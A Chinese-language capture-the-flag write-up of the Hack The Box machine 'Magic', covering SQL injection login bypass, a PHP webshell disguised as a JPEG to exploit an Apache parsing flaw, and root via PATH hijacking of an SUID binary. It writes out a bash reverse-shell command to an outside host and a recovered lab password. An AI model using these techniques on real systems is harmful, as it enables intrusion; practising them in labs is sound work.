Hack The Box——Magic
目录
简介
信息收集
漏洞发现
SQL注入漏洞
文件上传
Apache解析漏洞
漏洞利用
权限提升
普通用户Shell
SUID提权
总结
简介
该靶机比较容易上手,通过SQL注入登录到上传页面,然后利用Apache解析漏洞获得WebShell,进而利用SQL注入获取到的密码切换到普通用户,最后利用SUID提升至root权限。
信息收集
使用nmap扫描目标主机端口及服务,发现仅开启22和80端口,分别对应OpenSSH 7.6p1和Apache httpd 2.4.29服务,且操作系统为Ubuntu,如图:
通过搜索发现Apache 2.4.29存在解析漏洞(CVE-2017-15715),查看80端口Web服务,首页是一些图片,但在底部有登录链接,如图:
点击Login后页面转到了登录页,如图:
尝试常见弱口令无法登录。
漏洞发现
SQL注入漏洞
尝试输入用户名和密码均为('=')测试是否存在SQL注入,如图:
成功登录,说明存在SQL注入漏洞,使用sqlmap测试如图:
使用--current-user查看发现当前用户为theseus@localhost,并不是root。进一步查看数据库Magic发现用户名和密码,如图:
使用该用户名和密码可以登录到上传页面。尝试使用用户名admin,theseus和密码Th3s3usW4sK1ng通过SSH登录目标主机失败。
文件上传
尝试上传txt文件,发现只有服务器端做了白名单限制,仅允许JPG,JPEG和PNG文件上传。尝试使用00截断、畸形扩展名都无法绕过上传文件,文件后缀只能为jpg,jpeg和png。且上传后的文件在images/uploads/目录下,如图:
随便找一张jpg图片,使用copy /b shell.jpg+shell.php shell.jpg生成php图片马,shell.php中包含代码。尝试使用CVE-2017-15715绕过上传,重命名文件shell.php为shell.phpa.jpg,然后上传并拦截数据包,如图:
找到shell.phpa.jpg中'a'的二进制值'61'所在位置,如图:
然后修改为'0a',如图:
然后成功上传,如图:
Apache解析漏洞
访问图片地址发现没显示图片,而是成功解析了php代码,如图:
后来发现直接上传包含.php的图片文件就可以解析php代码,不用那么麻烦的修改二进制值。
如果觉得正常图片的数据会导致php代码解析时显示不美观,也可以创建test.php.jpg文件随便写入一写字符串,然后使用vim -b test.php.jpg以二进制格式打开文件,然后输入命令:%!xxd切换到十六进制模式,如图:
然后将数据修改为ffd8 ffe0,如图:
然后输入命令:%!xxd -r转回为二进制,然后保存退出。然后使用vim test.php.jpg打开文件,写入php代码,如图:
然后保存之后上传,如图:
这样显示就美观多了。
漏洞利用
使用msfvenom生成反弹shell的文件,如图:
在本地开启监听,然后执行上传的文件成功获得WebShell,如图:
权限提升
使用python3 -c 'import pty;pty.spawn("/bin/bash")'切换到虚拟终端,查看/etc/passwd,如图:
普通用户Shell
尝试使用数据库密码切换到普通用户,如图:
查看系统内核版本,如图:
内核较新,暂不尝试内核提权。查看sudo权限和SUID文件,如图:
在最后发现/bin/sysinfo,如图:
SUID提权
运行该程序可以看到CPU、内存和磁盘信息及使用情况。将pspy32上传到目标主机,然后将命令放入后台执行(./pspy32 &),再次执行/bin/sysinfo发现程序以root用户执行了lshw、fdisk和free命令,如图:
由于Linux中命令执行的优先级是:绝对路径或相对路径 > alias > 内部命令 > $PATH环境变量定义的目录查找顺序中找到的第一个命令。尝试使用alias劫持命令不起作有,然后使用PATH成功劫持命令。如图:
由于/bin/sh指向dash,直接使用bash命令会报错,尝试多次都无法直接使用bash反弹shell。最后发现执行echo 'echo "bash -i >&/dev/tcp/10.10.14.23/8443 0>&1" | /bin/bash' >lshw可以利用/bin/sysinfo反弹Shell了,如图:
总结
对该靶机的渗透很流畅,容易卡住的应该是上传那里,可能会想尽一切方法绕过,如果卡在那里就应该在想想配合解析漏洞吧。